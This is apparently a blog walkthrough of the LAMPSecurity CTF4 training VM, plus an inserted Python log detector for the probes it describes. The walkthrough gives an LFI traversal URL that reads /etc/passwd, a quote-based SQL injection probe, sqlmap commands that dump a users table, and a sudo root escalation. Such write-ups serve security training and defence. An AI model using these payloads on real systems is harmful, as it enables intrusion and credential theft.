April 26, 2019

LAMP security CTF4 Walk through





Hello readers,
Today we are going to look at another CTF, “LAMPSecurity CTF4” (//www.vulnhub.com/entry/lampsecurity-ctf4,83/).
The difficulty level is beginner, and the main objective is to obtain root privileges on the target system.

The VM is password protected and the credentials were intentionally not provided. Let’s give our best to break in and escalate to root privileges.


List of actions
 
1)    Find the target
2)    Scan for port and services
3)    HTTP enumeration (LFI Exploitation)
4)    SQLMAP scanning
5)    Dump and crack the hashes
6)    SSH login
7)    Root privilege escalation


Find the target

Try to find the target VM by executing the following command


Finally, we got our target: 172.16.2.45





Scan for port and services

In this step, we will scan for open ports and the services running on them.

nmap -A 172.16.2.45



Output

Port    Service    Version        State
22      ssh        OpenSSH 4.3    open
25      smtp       Sendmail       open
80      http       Apache         open


HTTP enumeration (LFI Exploitation)

Let’s navigate to the web application on port 80

 
Now, when I put the string below in the browser address bar, the application exposes an LFI flaw by displaying the server’s /etc/passwd file.

http://172.16.2.45/index.html?page=../../../../../../etc/passwd


Also, I found a SQL warning after appending a single quote (') to the end of the page URL.

http://172.16.2.45/index.html?page=blog&title=Blog&id=2'
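Both probes above (the directory traversal in the page parameter and the stray quote in the numeric id parameter) leave distinctive traces in the Apache access log. The following Python detector is an added example and not part of the original walkthrough; its log lines are constructed (the first two reproduce the request URLs shown above), and treating id as a numeric-only parameter is an assumption about the application.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format log lines (not from the original post): the first two
# reproduce the walkthrough's probe URLs, the third is a percent-encoded traversal
# variant, and the fourth is a benign request that must not be flagged.
SAMPLE_LOG = """\
172.16.2.10 - - [26/Apr/2019:10:01:02 +0000] "GET /index.html?page=../../../../../../etc/passwd HTTP/1.1" 200 1834
172.16.2.10 - - [26/Apr/2019:10:01:09 +0000] "GET /index.html?page=blog&title=Blog&id=2' HTTP/1.1" 200 2211
172.16.2.10 - - [26/Apr/2019:10:01:15 +0000] "GET /index.html?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1834
172.16.2.11 - - [26/Apr/2019:10:02:00 +0000] "GET /index.html?page=blog&title=Blog&id=5 HTTP/1.1" 200 2211
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A ".." path component, with either slash style, anywhere in the decoded value.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

# Assumption: the application only ever expects digits in these parameters.
NUMERIC_PARAMS = {"id"}

def inspect_request(target):
    """Return a list of (param, reason) findings for one request target (path + query)."""
    findings = []
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            # parse_qs decodes once; decode twice more so double-encoded probes are caught too.
            value = unquote(unquote(raw))
            if TRAVERSAL_RE.search(value) or value.startswith("/etc/"):
                findings.append((name, "path traversal / LFI probe"))
            if name in NUMERIC_PARAMS and not value.isdigit():
                findings.append((name, "non-numeric value in numeric parameter (SQLi probe)"))
    return findings

def scan_log(text):
    """Return (ip, target, findings) for every log line carrying a suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand; skip rather than crash
        findings = inspect_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, findings)
```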



Scanning with SQLMAP

Let’s scan the database with SQLMAP by executing the command below

sqlmap -u "http://172.16.2.45/index.html?page=blog&title=Blog&id=5" -p id --tables




After the command completes, we get details of several databases, but we will continue the enumeration with the ehks database.





Dump and crack the hashes 
In this section, we will enumerate the ehks database to get the contents of its users table.

sqlmap -u "http://172.16.2.45/index.html?page=blog&title=Blog&id=5" -p id -D ehks -T users --dump

 


We have successfully obtained the usernames and their credentials in the output.


SSH login

Let us use any of the user credentials to get a shell over SSH.

Yay! We got our first (restricted, non-root) shell on 172.16.2.45



Now let's check what restrictions apply to the current user account.
Execute sudo -l in the command shell and look at the output.




The above output shows that there is no restriction on the user.

Root privilege escalation

Now I will try to get root privileges by typing the command below
sudo -i






Wow! Finally, we have got root privileges on the system.

Thanks for reading my article on this CTF challenge. Please give your valuable feedback on the same in the below comment section.
